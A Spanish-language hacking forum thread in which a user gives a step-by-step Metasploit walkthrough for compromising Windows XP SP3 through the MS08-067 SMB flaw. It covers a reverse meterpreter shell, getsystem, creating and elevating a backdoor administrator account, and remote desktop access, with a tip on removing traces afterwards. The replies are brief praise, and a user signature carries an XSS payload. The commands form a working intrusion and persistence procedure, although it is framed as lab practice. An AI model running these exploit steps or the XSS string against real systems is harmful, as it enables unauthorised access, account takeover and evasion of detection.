Obtener GUI tras explotar Windows XP con Metasploit y meterpreter

  • 4 Respuestas
  • 5246 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Jimeno

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
  • Skype: migueljimeno96
  • Twitter: "><<img src=y onerror=prompt();>
    • Ver Perfil
    • Twitter



Buenas, en este post se muestra al proceso mediante el cual se accede a un Windows XP SP3 en una red LAN desde metasploit, se obtiene una sesión con meterpreter en el sistema y luego se añade un usuario con privilegios de administrador al sistema. Por último se obtiene una GUI remota, lo que podría facilitar determinadas acciones.
Si luego se quieren eliminar rastros una de las cosas más importantes es eliminar desde meterpreter el usuario creado.

Para esta práctica se utilizan:
   - BackTrack 5 R3
   - Windows XP SP3 virtualizado en VMWare Player

En todo momento se deben sustituir los valores:

   "miIP" por vuestra IP Local
   "suIP" por la IP de la máquina a vulnerar
   "tuusuario" por el nombre de usuario que elijas
   "tupass" por la contraseña que elijas

 Una vez presentado el entorno, aquí van los pasos:
   1- Comprobar la máquina vulnerada, para hacerlo de forma rápida se utilizará nmap. Sintaxis: nmap -O suIP
   2- Una vez comprobado, ejecutar la consola de Metasploit. Sintaxis: msfconsole
   3- Cargar el exploit. En este caso utilizamos uno que ataca al protocolo smb. Sintaxis: use exploit/windows/smb/ms08_067_netapi
   4- Seleccionamos un PAYLOAD, se utilizará un meterpreter con conexión inversa. Sintaxis: set PAYLOAD windows/meterpreter/reverse_tcp
   5- Se coloca la IP local. Sintaxis: set LHOST miIP
   6- Se coloca la IP remota. Sintaxis: set RHOST suIP
   7- Comprobar que no queden campos vacíos (opcional). Sintaxis: show options
   Debe salir algo así:

Citar
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.153    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.102    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


Nota: los campos de las IP deben ser los vuestros
   8- Lanzar el exploit. Sintaxis: exploit
   9- Una vez en meterpreter se obtiene el sistema. Sintaxis: getsystem
   10- Una vez tenemos privilegios hay que crear un nuevo usuario. sintaxis: run getgui -u tuusuario -p tupass -e
   11- Obtenemos una shell en el sistema. Sintaxis: shell
   12- Elevar privilegios al usuario. Sintaxis: net localgroups administradores tuusuario /add    Donde administradores es el nombre del grupo de admins.
   13- En una nueva pestaña de la terminal se utiliza la herramienta rdesktop. Sintaxis: rdesktop -u tuusuario -p tupass suIP

Y se abre una ventana con la GUI.



Un saludo ((:

« Última modificación: Febrero 15, 2013, 12:49:04 pm por Jimeno »
Contacto: @migueljimeno96 -

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
dale se nota ya has llegado a la parte de post-explotación de metaesploit para pentesters xd
PD : Buen post
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado Jimeno

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
  • Skype: migueljimeno96
  • Twitter: "><<img src=y onerror=prompt();>
    • Ver Perfil
    • Twitter
Sí, Sanko, la idea está sacada del libro, pero llegué hace mucho, de hecho lo terminé antes de fin de año.
Gracias ((:

dale se nota ya has llegado a la parte de post-explotación de metaesploit para pentesters xd
PD : Buen post
Contacto: @migueljimeno96 -

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
Sí, Sanko, la idea está sacada del libro, pero llegué hace mucho, de hecho lo terminé antes de fin de año.
Gracias ((:

dale se nota ya has llegado a la parte de post-explotación de metaesploit para pentesters xd
PD : Buen post
No es nada malo por si sono mal xd , lo del libro lo decia porque no hace mas de 3 dias acabe de leer sobre ello
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5620
  • País: ar
  • Actividad:
    100%
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email

 

Recreator-Backdoor - Linux And Windows Backdoor

Iniciado por AngelSecurityTeam

Respuestas: 0
Vistas: 289
Último mensaje Octubre 26, 2019, 09:07:28 pm
por AngelSecurityTeam
Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 4054
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Aplicación para enviar comandos a pc remota (Windows)

Iniciado por fermino

Respuestas: 6
Vistas: 6593
Último mensaje Noviembre 01, 2013, 08:23:34 pm
por aquelalle
Crackear password de administrador en windows usando Backtrack 3

Iniciado por Devilboy

Respuestas: 3
Vistas: 4601
Último mensaje Marzo 24, 2010, 12:46:31 am
por ||•?¤?- SeCurity-?¤?•||
Hackear servidor windows (ACTUALIZADO) + Cambiar DNS - By Ixidion13

Iniciado por Stiuvert

Respuestas: 0
Vistas: 4061
Último mensaje Abril 26, 2011, 06:05:06 pm
por Stiuvert